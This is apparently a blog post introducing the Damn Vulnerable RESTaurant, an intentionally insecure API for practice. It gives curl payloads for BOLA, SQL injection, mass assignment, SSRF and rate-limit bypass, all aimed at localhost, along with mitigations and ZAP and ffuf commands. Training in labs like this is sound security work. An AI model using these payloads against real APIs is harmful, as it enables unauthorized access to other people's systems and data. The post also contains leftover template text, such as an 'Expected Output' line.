Listen to this Post
The Damn Vulnerable RESTaurant is an intentionally insecure API service designed for developers, ethical hackers, and security engineers to practice identifying and exploiting common API vulnerabilities, including those listed in the OWASP Top 10 API Security Risks 2023.
🔗 GitHub Repository: https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant
🔗 Blog : https://medium.com/@krzysztofpranczk/introducing-damn-vulnerable-restaurant
You Should Know: Essential Commands & Techniques for Testing API Security
1. Setting Up the Lab
Clone the repository and run the vulnerable API locally:
git clone https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant.git cd Damn-Vulnerable-RESTaurant docker-compose up --build
2. Common API Attacks & Mitigations
Broken Object Level Authorization (BOLA)
Exploit:
curl -X GET http://localhost:8000/api/users/1 -H "Authorization: Bearer INVALID_TOKEN"
Mitigation: Implement proper access control checks.
Injection Attacks (SQLi, Command Injection)
Exploit (SQLi):
curl -X POST http://localhost:8000/api/login --data '{"username":"admin'--","password":"anything"}'
Mitigation: Use parameterized queries.
Mass Assignment
Exploit:
curl -X POST http://localhost:8000/api/users -H "Content-Type: application/json" -d '{"username":"attacker","isAdmin":true}'
Mitigation: Whitelist allowed fields.
Server-Side Request Forgery (SSRF)
Exploit:
curl -X GET http://localhost:8000/api/fetch?url=http://internal-server.local
Mitigation: Validate and sanitize URLs.
3. Automated API Scanning with OWASP ZAP
docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-api-scan.py -t http://localhost:8000/openapi.json -f openapi -r report.html
4. Fuzzing with FFUF
ffuf -u http://localhost:8000/api/FUZZ -w /usr/share/wordlists/dirb/common.txt
5. Rate Limiting Bypass
Exploit:
for i in {1..100}; do curl -X POST http://localhost:8000/api/reset_password --data '{"email":"[email protected]"}'; done
Mitigation: Implement rate limiting and CAPTCHA.
What Undercode Say
API security is critical in modern applications, and hands-on practice is essential. The Damn Vulnerable RESTaurant provides a safe environment to test exploits like BOLA, Injection, SSRF, and Mass Assignment. Always:
– Validate inputs
– Enforce strict authentication
– Monitor API traffic
– Use automated scanners like OWASP ZAP
For further learning, explore:
Expected Output:
A structured guide on exploiting and securing APIs using Damn Vulnerable RESTaurant, complete with practical commands and mitigations.
References:
Reported By: Krzysztof Pranczk – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅